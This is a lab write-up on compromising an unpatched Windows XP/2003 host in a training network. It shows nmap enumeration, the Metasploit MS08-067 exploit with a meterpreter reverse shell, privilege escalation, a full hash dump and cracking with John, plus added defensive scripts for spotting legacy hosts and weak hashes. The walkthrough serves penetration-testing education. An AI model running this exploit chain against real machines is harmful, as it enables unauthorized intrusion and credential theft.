The Dangers of Windows XP On Your Network

Windows XP has not been supported in years! For a large part of that unsupported period, a known flaw has allowed complete control of the asset.

This XP machine is found in the labs at https://pentest.training. I strongly urge you to log in and have a poke around, especially if you’re lacking the finances or knowledge to create your own lab.

We are using OpenVPN to connect to the labs hosted at http://pentest.training. On the network is an XP box. Our mission is to hunt it down and own it. It’s possibly the lowest-hanging fruit you’ll find in any network, and today we will show you why.

Once in the network you’ll find you’re given an IP in the realm of 10.0.100.x. This is only your VPN tunnel, as shown in ifconfig. Go back to the OpenVPN connection window you launched:

Sat Jan 13 10:18:27 2018 us=654083 /sbin/ip route add 10.0.10.0/24 via 10.0.100.161
Sat Jan 13 10:18:27 2018 us=667003 /sbin/ip route add 10.0.100.1/32 via 10.0.100.161

See how it’s setting up the routes for you: 10.0.10.0/24 is available to you, so we should start there. Whilst we could do an nmap discovery scan for all assets, I’m only interested in XP assets, so I’m going to try to enumerate the operating systems of all machines on this subnet:

nmap -O 10.0.10.0/24

The output displays nmap’s best guess at the OS of every device it scanned within the subnet. Searching through this list, we find a Windows box.

Nmap scan report for 10.0.10.103
Host is up (0.088s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1027/tcp open IIS
1028/tcp open unknown
3389/tcp open ms-wbt-server
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

We know this is a Windows box from the ports that are open. In a work environment it’s common to see 135, 139 and 445 open for use with file sharing protocols. IIS is another indicator that it is a Microsoft asset. Normally nmap would identify it as XP off the bat, but here we have to dig further to uncover what it is.

Enumerating a little further to confirm what’s running here we use:

nmap -sV 10.0.10.103

This gives us the “Service Version” of each open port, and a more detailed output:

root@AttackBox:~# nmap -sV 10.0.10.103

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-13 10:34 GMT
Nmap scan report for 10.0.10.103
Host is up (0.098s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Xlight ftpd 3.8
80/tcp   open  http          Microsoft IIS httpd 6.0
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
1027/tcp open  msrpc         Microsoft Windows RPC
1028/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.46 seconds
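
From the defender's side, the same nmap -sV output is enough to inventory end-of-life Windows hosts before someone else finds them. The sketch below is an added example, not code from the original post; the marker lists and the second host in the sample are assumptions made for illustration.

```python
import re

# Illustrative (assumed) markers of end-of-life Windows; extend for your estate.
EOL_CPES = ("windows_xp", "windows_2000", "windows_server_2003")
EOL_BANNERS = ("IIS httpd 5.", "IIS httpd 6.0")
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+\S+\s*(.*)$")

# Constructed sample in the shape of the scan above; 10.0.10.50 is invented.
SAMPLE = """\
Nmap scan report for 10.0.10.103
Host is up (0.098s latency).
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 6.0
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_server_2003

Nmap scan report for 10.0.10.50
Host is up (0.010s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

def legacy_hosts(scan_text):
    """Return {host: {"reasons": [...], "smb_exposed": bool}} for EOL hosts."""
    hosts, current = {}, None
    for line in scan_text.splitlines():
        if line.startswith("Nmap scan report for "):
            current = {"reasons": [], "ports": set()}
            hosts[line.split()[-1].strip("()")] = current
        elif current is None:
            continue
        elif (m := PORT_RE.match(line)):
            current["ports"].add(int(m.group(1)))
            if any(b in m.group(2) for b in EOL_BANNERS):
                current["reasons"].append(f"{m.group(1)}/tcp: {m.group(2).strip()}")
        elif line.startswith("Service Info:"):
            for cpe in re.findall(r"cpe:/[^\s,;]+", line):
                if any(p in cpe for p in EOL_CPES):
                    current["reasons"].append(cpe)
    # Only hosts with at least one EOL indicator are reported.
    return {h: {"reasons": d["reasons"], "smb_exposed": 445 in d["ports"]}
            for h, d in hosts.items() if d["reasons"]}

if __name__ == "__main__":
    for host, info in legacy_hosts(SAMPLE).items():
        print(host, info)
```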

Now we are pretty sure this is an XP asset (or an extremely poorly configured Windows box). Let’s fire up our Metasploit console using:

msfconsole

Once in, we can start to build our attack stagers. We will be using the well-known exploit for MS08-067, which has left XP vulnerable and an easy target. We can search for the exploit using:

search ms08_067

Now we can prep the attack: first getting the payload set up, then configuring the exploit.

msf > use payload/windows/meterpreter/reverse_tcp
msf payload(reverse_tcp) > options

Module options (payload/windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

msf payload(reverse_tcp) > set LHOST 10.0.100.162
LHOST => 10.0.100.162
msf payload(reverse_tcp) > search ms08_067
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption




msf payload(reverse_tcp) > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)




Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting




msf exploit(ms08_067_netapi) > set RHOST 10.0.10.103
RHOST => 10.0.10.103
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.0.100.162:4444 
[*] 10.0.10.103:445 - Automatically detecting the target...
[*] 10.0.10.103:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 10.0.10.103:445 - We could not detect the language pack, defaulting to English
[*] 10.0.10.103:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 10.0.10.103:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 10.0.10.103
[*] Meterpreter session 1 opened (10.0.100.162:4444 -> 10.0.10.103:1165) at 2018-01-13 10:55:46 +0000

meterpreter >

Now that we have a meterpreter shell we can raise ourselves to SYSTEM with no hassle and dump the local hashes. I always run ifconfig/ipconfig to orientate myself on any new system. Should the system be multi-homed, you’ll instantly open up an avenue of attack to scan while you work more on the local box.

meterpreter > ifconfig

Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1




Interface 65539
============
Name         : Realtek RTL8139 Family PCI Fast Ethernet NIC
Hardware MAC : 36:71:58:17:48:d4
MTU          : 1500
IPv4 Address : 10.0.10.103
IPv4 Netmask : 255.255.255.0




meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > hashdump
Administrator:500:62eda20bfe122e1ffcff707fcab12bbb:655d1f38d5f2d9c44b2d807dccdbf8c7:::
ASPNET:1007:b3e5cccfedf674b1af941a4c244b4a37:37eb9ecbe24ce87801f3cc5ed0236e55:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_WIN2K3:1003:462782f4bea3ee6fcd93ab145a7a72ed:888efd92ee2f6df097b1c030fe137129:::
IWAM_WIN2K3:1004:756461186864d115b2e6f6d1864bce53:bdff2ae5f2a87d3fc1c754b11726f4b6:::
ned:1008:7ecf9e1d993c2b3b3180a3e4909c3aaa:9830f413f074ae2a2decf1f2193f170f:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:cbdab80c3d45744ed6f1eea41c0ac9fd:::

meterpreter >

Pro tip about the hashes: look at the number between the username and the hash (the account’s relative identifier, or RID):

  • A 500 indicates an administrative account
  • and a 501 is a guest account.

Sometimes admins rename guest to admin in order to throw attackers down the wrong path… so keep an eye out for that!

For the sake of shits and giggles, since we have the password hashes… let’s slap them through John quickly. Paste them into a file on the desktop creatively called “hashes” and run it through John:

root@AttackBox:~# john --rules=ALL ~/Desktop/hashes 
Warning: detected hash type "LM", but the string is also recognized as "NT"
Use the "--format=NT" option to force loading these as that type instead
Warning: detected hash type "LM", but the string is also recognized as "NT-old"
Use the "--format=NT-old" option to force loading these as that type instead
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 12 password hashes with no different salts (LM [DES 128/128 AVX-16])
Remaining 9 password hashes with no different salts
Press 'q' or Ctrl-C to abort, almost any other key for status
SUMM3RL          (ned:1)
1g 0:00:00:32 11.91% 2/3 (ETA: 11:08:01) 0.03090g/s 743177p/s 743177c/s 6246KC/s DOORS*9..@SDFGH
Warning: passwords printed above might be partial
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

Silly ned.
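
The RID tip and John's "LM" warning above are both things an administrator can check for in a hashdump-style export of their own accounts. The audit below is an added example, not code from the original post; the sample records are constructed and their non-empty hash values are placeholders.

```python
# Well-known constants: the LM value shown when no LM hash is stored,
# and the NT hash of a blank password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
BUILTIN = {500: "administrator", 501: "guest"}

# Constructed sample in user:rid:lm:nt::: form; hash values are placeholders.
SAMPLE = """\
admin:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
helpdesk:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
Administrator:1009:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
"""

def audit(dump):
    """Return {account name: [findings]} for each user:rid:lm:nt::: record."""
    report = {}
    for line in dump.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # not an account record
        name, rid = parts[0], int(parts[1])
        lm, nt = parts[2].lower(), parts[3].lower()
        notes = []
        if rid in BUILTIN:
            # The RID, not the display name, identifies the built-in account.
            notes.append(f"built-in {BUILTIN[rid]} (RID {rid})")
            if name.lower() != BUILTIN[rid]:
                notes.append("renamed")
        elif name.lower() in BUILTIN.values():
            notes.append("decoy name on an ordinary RID")
        if lm != EMPTY_LM:
            # LM is case-insensitive and hashed as two 7-character halves,
            # which is why John reports partial, upper-case results.
            notes.append("LM hash stored")
        if nt == EMPTY_NT:
            notes.append("blank password")
        report[name] = notes
    return report

if __name__ == "__main__":
    for account, notes in audit(SAMPLE).items():
        print(f"{account}: {', '.join(notes) or 'no findings'}")
```

Any account flagged "LM hash stored" will keep that hash until LM storage is disabled by policy and the password is changed.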

 

 

